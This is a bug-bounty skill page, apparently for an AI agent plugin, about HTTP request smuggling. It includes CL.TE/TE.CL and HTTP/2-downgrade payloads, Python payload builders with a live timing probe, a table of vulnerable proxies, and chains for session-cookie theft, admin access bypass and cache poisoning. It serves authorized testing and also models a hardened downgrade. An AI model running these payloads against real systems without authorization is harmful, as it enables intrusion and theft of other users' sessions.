From claude-bughunter
Hunts HTTP request smuggling (CL.TE, TE.CL, H2.CL, H2.TE) with detection, timing confirmation, and impact chains (cache poisoning, credential theft, auth bypass). Includes target-suitability matrix for modern proxies.
Slash command: /claude-bughunter:hunt-http-smuggling

Summary Claude sees in its skill listing (used to decide when to auto-load this skill):

> Lowest dup rate. $5K–$30K. PortSwigger research by James Kettle.
The classic CL.TE payload. Line endings are CRLF, and the 13-byte body is exactly `0\r\n\r\nSMUGGLED`: a terminating chunk that a TE-parsing back-end stops at, followed by bytes it will treat as the start of the next request.

```http
POST / HTTP/1.1
Host: target
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED
```
1. Burp extension: HTTP Request Smuggler (BApp Store).
2. Right-click request → Extensions → HTTP Request Smuggler → Smuggle probe.
3. Manual timing confirmation: send a CL.TE timing probe (Content-Length covers only the first chunk-size line and part of its data). A response that arrives only after ~10s, or not at all, means the back-end is still waiting for the rest of a chunked body the front-end never forwarded. Probe CL.TE first and TE.CL only if CL.TE is ruled out: a TE.CL-shaped probe sent to a CL.TE-vulnerable host poisons the connection for other users.
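To make the detection logic above concrete, here is an added Python example (not claude-bughunter's own code) that replays the CL.TE and TE.CL payloads through a Content-Length parser and a chunked parser and reports which bytes the back-end would glue onto the next request on the connection, plus whether a timing probe would leave the back-end waiting. The host name `target`, the follow-up `/next` request and the `probe_latency` helper are assumptions for illustration; `probe_latency` is the only part that touches a network and is meant only for targets you are authorized to test.

```python
# Added example (not claude-bughunter's code): replay CL.TE / TE.CL offline by running the
# same bytes through a Content-Length parser and a chunked parser. Host `target` and the
# probe_latency helper are illustrative assumptions.
import socket
import ssl
import time

CRLF = b"\r\n"

def split_head(stream):
    """(headers incl. trailing blank line, remainder), or None while headers are incomplete."""
    i = stream.find(CRLF + CRLF)
    return None if i < 0 else (stream[:i + 4], stream[i + 4:])

def header(head, name):
    """Case-insensitive header lookup; stripped value or None."""
    for line in head.split(CRLF):
        if b":" in line:
            k, v = line.split(b":", 1)
            if k.strip().lower() == name.lower():
                return v.strip()
    return None

def consume_by_content_length(stream):
    """Parser that honours Content-Length: (request, leftover), or (None, b'') while waiting."""
    parts = split_head(stream)
    if parts is None:
        return None, b""
    head, rest = parts
    n = int(header(head, b"content-length") or b"0")
    if len(rest) < n:
        return None, b""                      # body not fully received: keeps waiting
    return head + rest[:n], rest[n:]

def consume_by_chunked(stream):
    """Parser that honours Transfer-Encoding: chunked; the body ends at the 0-size chunk."""
    parts = split_head(stream)
    if parts is None:
        return None, b""
    head, rest = parts
    pos = 0
    while True:
        eol = rest.find(CRLF, pos)
        if eol < 0:
            return None, b""                  # chunk-size line incomplete: keeps waiting
        size = int(rest[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            if rest[pos:pos + 2] != CRLF:
                return None, b""              # waiting for the CRLF after the last chunk
            return head + rest[:pos + 2], rest[pos + 2:]
        if len(rest) < pos + size + 2:
            return None, b""                  # chunk data not fully received: keeps waiting
        pos += size + 2

def desync_prefix(stream, front, back):
    """Bytes the back-end glues onto the NEXT request: what `front` forwards as one request
    minus what `back` consumes from it. b'' means both parsers agree (no desync)."""
    forwarded, _ = front(stream)
    if forwarded is None:
        return None
    consumed, leftover = back(forwarded)
    return None if consumed is None else leftover

def backend_stalls(stream, front, back):
    """True when the front-end forwards a complete request but the back-end keeps waiting
    for more body: the timing signal from step 3."""
    forwarded, _ = front(stream)
    return forwarded is not None and back(forwarded)[0] is None

def request(host, path, body, content_length=None, chunked=True):
    cl = len(body) if content_length is None else content_length
    lines = [b"POST " + path + b" HTTP/1.1", b"Host: " + host,
             b"Content-Length: " + str(cl).encode()]
    if chunked:
        lines.append(b"Transfer-Encoding: chunked")
    return CRLF.join(lines) + CRLF + CRLF + body

# Classic PortSwigger payload shapes.
def clte_attack(host):
    return request(host, b"/", b"0\r\n\r\nSMUGGLED")               # CL 13 covers everything
def tecl_attack(host):
    return request(host, b"/", b"8\r\nSMUGGLED\r\n0\r\n\r\n", 3)   # CL 3 covers only "8\r\n"
def clte_timing(host):
    return request(host, b"/", b"1\r\nZ\r\nQ", 4)                  # TE back-end waits for chunk data
def tecl_timing(host):
    return request(host, b"/", b"0\r\n\r\nX", 6)                   # CL back-end waits for byte 6

def probe_latency(host, port, payload, timeout=10.0, tls=True):
    """Live probe: seconds to the first response byte, or None when the back-end stalls
    until the timeout. Authorized targets only."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if tls:
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    start = time.monotonic()
    with sock:
        sock.sendall(payload)
        try:
            sock.recv(1)
        except socket.timeout:
            return None
    return time.monotonic() - start
```

Running `desync_prefix(clte_attack(b"target") + next_request, consume_by_content_length, consume_by_chunked)` yields `b"SMUGGLED"`, which the back-end prepends to the next request (the familiar "Unrecognized method SMUGGLEDGET"); swapping the parser order for `tecl_attack` shows the TE.CL leftover, and passing the same parser on both sides returns `b""`, which is why a timing delta seen only by your own client proves parser disagreement and nothing more.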
Poison next request → access admin as victim
Steal credentials → capture victim's session
Cache poisoning → stored XSS at scale
The classic CL.TE / TE.CL payloads are NOT universally exploitable in 2026. Modern proxies are RFC 9112 strict by default. Fingerprint the front-end BEFORE investing time.
| Front-end | CL.TE | TE.CL | H2.CL | H2.TE | Notes |
|---|---|---|---|---|---|
| Nginx ≥ 1.21 | NO | NO | partial (H2 ingress) | partial | RFC-strict; rejects CL+TE with HTTP 400. Verified locally on Nginx 1.27 — all 9 documented variants killed by front-end (docs/verification/phase2h-smuggling-cachepoison.md). |
| Caddy 2.x | NO | NO | — | — | Hardened by default |
| Envoy ≥ 1.20 | NO | NO | partial | partial | Hardened in most paths |
| HAProxy 2.0–2.4 (unpatched) | ✓ | ✓ | — | — | Vulnerable, see CVE-2021-40346 (fixed in 2.0.25 / 2.2.17 / 2.3.14 / 2.4.4) |
| AWS ALB + specific upstream | partial | partial | ✓ | ✓ | Several disclosed-paid reports 2022-2024 |
| Cloudflare → S3 / Lambda chains | — | — | ✓ | ✓ | H2-downgrade attacks remain viable |
| Older F5 BIG-IP (TMM < 16) | ✓ | — | — | — | Vendor advisories |
| Citrix ADC / NetScaler (older firmware) | ✓ | ✓ | — | — | Disclosed in 2020-2022 |
| Squid 3.x | ✓ | — | — | — | Older deployments |
| Apache Traffic Server (older) | ✓ | ✓ | ✓ | ✓ | PortSwigger research |
| Custom Python / Go proxies | ✓ | ✓ | — | — | Frequently miss RFC enforcement |
Fingerprint the front-end first:

```bash
curl -sI https://target/ | grep -i "^Server:"
```

- nginx/1.21+, Caddy, envoy → classic CL/TE is dead. Pivot to H2.CL/H2.TE if the front-end speaks HTTP/2 to clients, or look for a legacy proxy further upstream.
- HAProxy, or a header that points to AWS/a CDN → run the full payload matrix.
- Anything else → send the space-before-colon probe (a header such as `Transfer-Encoding : chunked`); a front-end that does not answer 400 is lenient, dig deeper.

H2-downgrade smuggling relies on the front-end speaking HTTP/2 to the client and HTTP/1.1 to the origin. HTTP/2 carries the body length in its DATA frames, so a client-supplied Content-Length or Transfer-Encoding header is redundant there; a front-end that copies such a header into the downgraded HTTP/1.1 request without checking it against the real frame length hands the origin a length it never validated, and the CL/TE confusion reappears on the back half of the hop. Most CDN+origin chains in 2024-2026 use this exact topology.
Against CDN-fronted targets, start with tooling that lets you craft the HTTP/2 request itself: Burp's HTTP Request Smuggler extension (on top of Burp's native HTTP/2 stack) covers the H2.CL/H2.TE downgrade probes, and h2csmuggler covers the separate h2c (cleartext upgrade) smuggling case. smuggler.py is an HTTP/1.1 CL.TE/TE.CL prober and never exercises the downgrade path; the same goes for curl and raw sockets, which give you no control over the HTTP/2 framing the downgrade probes depend on. Used against an H2-front-ended target, those clients test the wrong protocol entirely.
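As an added example (not part of claude-bughunter, and not any real proxy's code), the following Python models the downgrade step the paragraph above describes: an HTTP/2 request arrives as decoded header pairs plus DATA payload, and the front-end has to synthesize an HTTP/1.1 request for the origin. `downgrade_naive` copies a client-supplied `content-length` through unchecked and so reproduces the H2.CL shape; `downgrade_strict` applies the RFC 9113 rules (connection-specific headers such as `transfer-encoding` make the request malformed, as does a `content-length` that disagrees with the DATA length) and always emits the length from the framing. The origin model, the `/admin` smuggled request and the host `target` are constructed for illustration.

```python
# Added example, not claude-bughunter's or any real proxy's code: a model of the H2 -> HTTP/1.1
# downgrade that H2.CL / H2.TE smuggling abuses. Header names are lowercase as HTTP/2 requires.
CRLF = b"\r\n"
# RFC 9113 s8.2.2: these must not appear in an HTTP/2 message; if they do, it is malformed.
CONNECTION_SPECIFIC = {b"connection", b"keep-alive", b"proxy-connection",
                       b"transfer-encoding", b"upgrade"}

def h2_request(path, data, extra=()):
    """Decoded HEADERS pairs (pseudo-headers first) plus the concatenated DATA payload."""
    pseudo = [(b":method", b"POST"), (b":path", path),
              (b":scheme", b"https"), (b":authority", b"target")]   # constructed host
    return pseudo + list(extra), data

def h1(pseudo, lines, data):
    """Serialise the downgraded request the origin will parse as HTTP/1.1."""
    start = pseudo[b":method"] + b" " + pseudo[b":path"] + b" HTTP/1.1"
    return CRLF.join([start, b"Host: " + pseudo[b":authority"]] + lines) + CRLF + CRLF + data

def downgrade_naive(req):
    """H2.CL-shaped bug: regular headers are copied verbatim, so a client-supplied
    content-length reaches the origin even though it never described the DATA frames."""
    headers, data = req
    pseudo = {k: v for k, v in headers if k.startswith(b":")}
    lines = [k + b": " + v for k, v in headers if not k.startswith(b":")]
    if not any(l.lower().startswith(b"content-length:") for l in lines):
        lines.append(b"Content-Length: " + str(len(data)).encode())
    return h1(pseudo, lines, data)

def downgrade_strict(req):
    """Hardened downgrade: malformed requests are rejected (None, i.e. RST_STREAM) and
    Content-Length is always derived from the framing, never copied from the client."""
    headers, data = req
    pseudo = {k: v for k, v in headers if k.startswith(b":")}
    lines = []
    for k, v in headers:
        if k.startswith(b":"):
            continue
        if k in CONNECTION_SPECIFIC:
            return None                       # transfer-encoding etc.: malformed
        if k == b"content-length":
            if int(v) != len(data):
                return None                   # RFC 9113 s8.1.1: must equal the DATA length
            continue                          # re-emitted below from the framing
        lines.append(k + b": " + v)
    lines.append(b"Content-Length: " + str(len(data)).encode())
    return h1(pseudo, lines, data)

def origin_by_content_length(h1_bytes):
    """Minimal origin model: trusts Content-Length, treats any surplus as the next request."""
    head, rest = h1_bytes.split(CRLF + CRLF, 1)
    n = 0
    for line in head.split(CRLF):
        if line.lower().startswith(b"content-length:"):
            n = int(line.split(b":", 1)[1].strip())
    return head + CRLF + CRLF + rest[:n], rest[n:]

def smuggled_through(downgrade, req):
    """What the origin would see as a second, attacker-authored request (None = rejected)."""
    h1_bytes = downgrade(req)
    return None if h1_bytes is None else origin_by_content_length(h1_bytes)[1]

if __name__ == "__main__":
    # Constructed: a route the front-end ACL blocks, hidden in the DATA of a POST to /.
    smuggled = b"GET /admin HTTP/1.1\r\nHost: target\r\n\r\n"
    attack = h2_request(b"/", smuggled, [(b"content-length", b"0")])
    print(smuggled_through(downgrade_naive, attack))    # the /admin request reaches the origin
    print(smuggled_through(downgrade_strict, attack))   # None: stream reset at the front-end
```

The naive path is exactly the H2.CL primitive: the front-end never read the client's `content-length: 0` for its own parsing (the stream told it the body was the DATA frame), but the origin does, and everything after byte zero becomes a request the ACL never saw. The strict path also rejects the H2.TE shape, because `transfer-encoding` is connection-specific and has no legitimate place in an HTTP/2 request.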
Related skills:

- hunt-cache-poison — Smuggling + cache is the canonical critical chain: one smuggled request becomes the cached response for every subsequent victim. Chain primitive: CL.TE-smuggle a request whose response body carries attacker HTML/JS; the front-end cache stores that response under a popular URL (/, /login); every visitor to that URL for the rest of the cache TTL receives it.
- hunt-auth-bypass — Smuggling reaches internal-only routes that the front-end WAF/auth-proxy filters out. Chain primitive: smuggle `GET /admin/users HTTP/1.1` past the front-end ACL that blocks external /admin/*; the back-end processes it as if it came from a trusted internal hop; the admin data lands in the response queue.
- hunt-idor — Smuggling attaches the NEXT user's session cookies to an attacker-controlled request. Chain primitive: smuggle a prefix for `GET /api/me HTTP/1.1` with no cookies; the back-end completes it with the bytes of the next legitimate user's request, Cookie header included, so the victim's session rides on the attacker's request and the attacker reads the response containing the victim's PII/tokens.
- hunt-xss — Smuggling injects XSS payloads into the next victim's response stream without ever appearing in a URL parameter. Chain primitive: the smuggled request body carries a reflected payload that the back-end renders into the next response in the queue; the next visitor to / receives attacker HTML inline, with no URL parameter visible to them or in the logs.
- security-arsenal — Reach for the smuggling payload bank (CL.TE / TE.CL / TE.TE obfuscations, H2.CL downgrade probes, h2csmuggler one-liners, Burp HTTP Request Smuggler extension config) and the time-delay confirmation template before manual hex-editing.
- triage-validation — Run the Pre-Severity Gate before claiming Critical: the smuggled-request effect MUST land on a request issued by a different client/session, not your own follow-up. A timing delta in your own browser alone is parser disagreement, not exploitable smuggling.

Install:

```bash
npx claudepluginhub elementalsouls/claude-bughunter
```

Skill description: HTTP request smuggling checklist covering CL.TE, TE.CL, TE.TE variants, timing/differential detection, WAF bypass, cache poisoning, credential hijacking, and HTTP/2 smuggling. Use when testing reverse proxy or load balancer configurations. Detects and exploits HTTP request smuggling vulnerabilities caused by Content-Length and Transfer-Encoding parsing discrepancies between front-end and back-end servers. For authorized penetration tests against multi-tier, proxied web architectures, using Burp Suite, curl, and smuggler.py.